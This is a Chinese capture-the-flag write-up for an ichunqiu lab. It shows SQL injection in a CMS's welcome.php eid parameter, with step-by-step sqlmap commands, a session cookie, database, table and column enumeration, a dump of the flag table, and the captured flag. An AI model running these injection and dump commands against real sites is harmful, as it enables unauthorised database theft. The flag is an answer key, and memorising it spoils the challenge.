该CMS的welcome.php中存在SQL注入攻击。
1、启动场景
2、注册任意用户
3、登录成功进入主页
http://eci-2zeibhtak45hqikoch7i.cloudeci1.ichunqiu.com/welcome.php?q=1
q参数存在注入,使用sqlmap尝试未果,点击3.start(任意start都可)
http://eci-2zeibhtak45hqikoch7i.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0&n=1&t=10
python3 sqlmap.py -u "http://eci-2zeibhtak45hqikoch7i.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0&n=1&t=10"
| 参数 | 详解 |
|---|---|
| -u | 指定url |
| -D | 指定数据库名 |
| -T | 指定数据表名 |
| -C | 指定列名 |
| –dbs | 获取数据库 |
| –dump | 导出 |
| –columns | 获取数据列 |
| –tables | 获取数据表 |
| –cookie | 指定cookie信息 |
重定向302,需添加cookie
python3 sqlmap.py -u "http://eci-2zeibhtak45hqikoch7i.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0&n=1&t=10" --cookie="Hm_lvt_2d0601bd28de7d49818249cf35d95943=1687146393,1687227019,1687314814; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1687328243; PHPSESSID=jcrla8optvjpmjparqm08bid4k" --dbs
eid参数存在注入点,获取数据库ctf中的数据表
python3 sqlmap.py -u "http://eci-2zeibhtak45hqikoch7i.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0&n=1&t=10" --cookie="Hm_lvt_2d0601bd28de7d49818249cf35d95943=1687146393,1687227019,1687314814; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1687328243; PHPSESSID=jcrla8optvjpmjparqm08bid4k" -D "ctf" --tables
获取fiag数据列
python3 sqlmap.py -u "http://eci-2zeibhtak45hqikoch7i.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0&n=1&t=10" --cookie="Hm_lvt_2d0601bd28de7d49818249cf35d95943=1687146393,1687227019,1687314814; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1687328243; PHPSESSID=jcrla8optvjpmjparqm08bid4k" -D "ctf" -T "flag" --columns
获取fiag字段
python3 sqlmap.py -u "http://eci-2zeibhtak45hqikoch7i.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0&n=1&t=10" --cookie="Hm_lvt_2d0601bd28de7d49818249cf35d95943=1687146393,1687227019,1687314814; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1687328243; PHPSESSID=jcrla8optvjpmjparqm08bid4k" -D "ctf" -T "flag" --dump
得到flag
flag{baf0a619-41fe-4d10-b44c-faa99ee79cca}